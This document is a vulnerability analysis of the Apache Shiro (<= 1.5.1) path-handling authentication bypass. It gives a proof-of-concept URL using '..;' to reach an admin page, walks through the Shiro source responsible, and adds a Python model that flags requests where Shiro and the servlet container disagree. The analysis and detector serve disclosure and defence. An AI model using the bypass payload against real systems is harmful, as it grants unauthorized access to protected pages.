Affected versions: Shiro <= 1.5.1
POC:
http://192.168.174.1:8081/doLogin/..;/admin/page
In the getChain() method of org/apache/shiro/web/filter/mgt/PathMatchingFilterChainResolver.java:

    String requestURI = getPathWithinApplication(request);

Following getPathWithinApplication():

    public static String getPathWithinApplication(HttpServletRequest request) {
        String contextPath = getContextPath(request);
        String requestUri = getRequestUri(request);
        if (StringUtils.startsWithIgnoreCase(requestUri, contextPath)) {
            // Normal case: URI contains context path.
            String path = requestUri.substring(contextPath.length());
            return (StringUtils.hasText(path) ? path : "/");
        } else {
            // Special case: rather unusual.
            return requestUri;
        }
    }
Following getRequestUri():

    public static String getRequestUri(HttpServletRequest request) {
        String uri = (String) request.getAttribute(INCLUDE_REQUEST_URI_ATTRIBUTE);
        if (uri == null) {
            uri = request.getRequestURI();
        }
        return normalize(decodeAndCleanUriString(request, uri));
    }
Once again the two familiar functions, decodeAndCleanUriString and normalize:

    private static String decodeAndCleanUriString(HttpServletRequest request, String uri) {
        uri = decodeRequestString(request, uri);
        int semicolonIndex = uri.indexOf(';');
        return (semicolonIndex != -1 ? uri.substring(0, semicolonIndex) : uri);
    }
It URL-decodes first and then truncates at the first semicolon; the consequence should be clear from here.
The path Shiro ends up matching its filter chains against is /doLogin/..
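As an added illustration (not code from the original writeup or from Shiro), the following Python models the two parsers whose disagreement is at the root of this bug: Shiro's decodeAndCleanUriString + normalize on one side, and a simplified servlet-container view that strips `;` path parameters per segment on the other; a request where the two views differ is the signal a defender can log or block at a reverse proxy or WAF. The container model and the sample URIs are assumptions constructed here, not Shiro or Tomcat code.

```python
from urllib.parse import unquote

def shiro_normalize(path):
    """Mirror of Shiro's WebUtils.normalize(): collapses '//', '/./' and '/../' only,
    so a trailing '/..' with nothing after it is left untouched."""
    n = path.replace('\\', '/')
    if not n.startswith('/'):
        n = '/' + n
    while '//' in n:
        n = n.replace('//', '/')
    while '/./' in n:
        n = n.replace('/./', '/')
    while (i := n.find('/../')) >= 0:
        if i == 0:
            return None  # Shiro rejects paths that climb above the root
        n = n[:n.rfind('/', 0, i)] + n[i + 3:]
    return n

def shiro_path(request_uri):
    """Path Shiro <= 1.5.1 matches filter chains against: URL-decode, truncate at
    the first ';' (decodeAndCleanUriString), then normalize."""
    decoded = unquote(request_uri)
    semi = decoded.find(';')
    return shiro_normalize(decoded[:semi] if semi != -1 else decoded)

def container_path(request_uri):
    """Simplified (assumed) model of the servlet container: ';param' is stripped per
    segment, so '..;' is still a '..' segment and is collapsed against the previous one."""
    out = []
    for seg in request_uri.split('/'):
        seg = unquote(seg.split(';', 1)[0])
        if seg == '..':
            if out:
                out.pop()
        elif seg not in ('', '.'):
            out.append(seg)
    return '/' + '/'.join(out)

def is_path_confusion(request_uri):
    """True when Shiro and the container disagree on which resource is requested."""
    return shiro_path(request_uri) != container_path(request_uri)

# Constructed sample request URIs (not real traffic); only the second one diverges.
SAMPLE_URIS = ["/doLogin", "/doLogin/..;/admin/page", "/admin/page;jsessionid=ABC123"]

def scan(uris):
    """Return (uri, shiro_view, container_view) for every diverging request URI."""
    return [(u, shiro_path(u), container_path(u)) for u in uris if is_path_confusion(u)]
```

A legitimate `;jsessionid=` path parameter does not trigger the check, because both views agree on it; only a `;` that hides a `..` segment from Shiro's chain matching does.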